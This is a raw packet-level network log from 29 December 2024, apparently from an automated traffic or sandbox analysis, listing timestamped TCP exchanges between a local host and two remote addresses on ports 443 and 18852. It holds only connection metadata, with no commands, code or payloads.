                                                                                                                                                                                                            Dec 29, 2024 09:02:04.695774078 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.697148085 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.697163105 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.697210073 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.697217941 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.699774981 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.789347887 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.789366007 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.789427996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.789437056 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.789542913 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:04.829176903 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.445194960 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.445245028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.445256948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.445292950 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450845957 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450860977 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450896978 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450910091 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450927019 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.450942993 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.455832005 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.455848932 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.455908060 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.455919981 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.455955029 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.461544991 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.461560965 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.461621046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.461631060 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.461664915 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.466818094 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.466831923 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.466901064 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.466912985 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.466948032 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.557929039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.557964087 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.558008909 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.558027029 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.558043003 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.558064938 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.598258972 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.598278046 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.598335028 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.598346949 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.598381996 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.632044077 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.632062912 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.632287979 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.632297039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.632337093 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.637676001 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.637690067 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.637762070 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.637768030 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.637797117 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.642657995 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.642673016 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.642744064 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.642750978 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.642791033 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.648279905 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.648296118 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.648363113 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.648370981 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.648411989 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.653949976 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.653965950 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.654041052 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.654056072 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.654097080 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.659198046 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.659213066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.659280062 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.659293890 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.659328938 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750055075 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750080109 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750128031 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750152111 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750174046 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.750185966 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.790277004 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.790294886 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.790482044 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.790543079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.790597916 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.824996948 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.825015068 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.825076103 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.825098038 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.825128078 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.825150967 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.830635071 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.830650091 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.830717087 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.830733061 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.830785990 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.835675955 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.835690975 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.835753918 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.835784912 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.835841894 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841331959 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841358900 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841408968 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841423988 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841463089 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.841485023 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.846888065 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.846904039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:05.846968889 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.423738003 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429588079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429603100 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429655075 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429675102 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429702997 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.429723024 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449104071 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449136019 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449160099 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449186087 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449284077 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449301004 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449317932 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449326992 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449337006 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449353933 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449534893 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449552059 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449568033 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449577093 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.449609995 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.518531084 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.518559933 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.518640041 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.518663883 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.518717051 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.558590889 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.558609009 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.558670998 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.558686972 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.558736086 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.568707943 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.568738937 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.568789959 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.594130993 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.594146967 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.594213009 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.594229937 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.594293118 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.599663973 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.599679947 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.599766016 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.599781990 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.599836111 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.605355978 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.605371952 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.605446100 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.605460882 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.605510950 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610321045 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610346079 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610408068 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610423088 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610449076 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.610466957 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.615906000 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.615921974 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.616003990 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.616041899 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.616105080 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.621331930 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.621347904 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.621416092 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.621431112 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.621498108 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.657597065 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.657696962 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.657752991 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.661775112 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.661854029 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.661904097 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.670145035 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.670232058 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.670284986 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.678477049 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.678579092 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.678633928 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.686882973 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.686975956 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.687026024 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.695235968 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.695379972 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.695430040 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.703613043 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.703721046 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.703777075 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710633039 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710655928 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710735083 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710756063 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710787058 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.710808039 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.711966038 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.712059975 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.712111950 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.720341921 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.720448017 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.720491886 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.728729010 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.728838921 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.728992939 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.995366096 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.995388985 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:06.995771885 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.000293016 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.000308990 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.000366926 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.000381947 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.000473022 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006232023 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006290913 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006309986 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006330013 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006359100 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.006378889 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.012983084 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.074311018 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.074351072 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.074405909 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.076309919 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.076392889 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.076447010 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.079457998 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.079550982 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.079605103 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.083488941 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.083610058 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.083662033 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.087580919 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.087696075 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.087747097 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.091599941 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.091710091 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.091753960 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094651937 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094671011 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094734907 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094758987 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094774008 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.094795942 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.095490932 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.095603943 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.095649004 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.099354029 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.099483967 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.099526882 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.103178978 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.103280067 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.103323936 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.106986046 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.107105970 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.107148886 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.110810995 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.110934973 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.110989094 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.114592075 CET1885249736118.107.44.219192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.114665985 CET4973618852192.168.2.4118.107.44.219
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135667086 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135688066 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135742903 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135761976 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135776997 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.135822058 CET49735443192.168.2.4149.129.12.34
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170798063 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170823097 CET44349735149.129.12.34192.168.2.4
                                                                                                                                                                                                            Dec 29, 2024 09:02:07.170874119 CET49735443192.168.2.4149.129.12.34
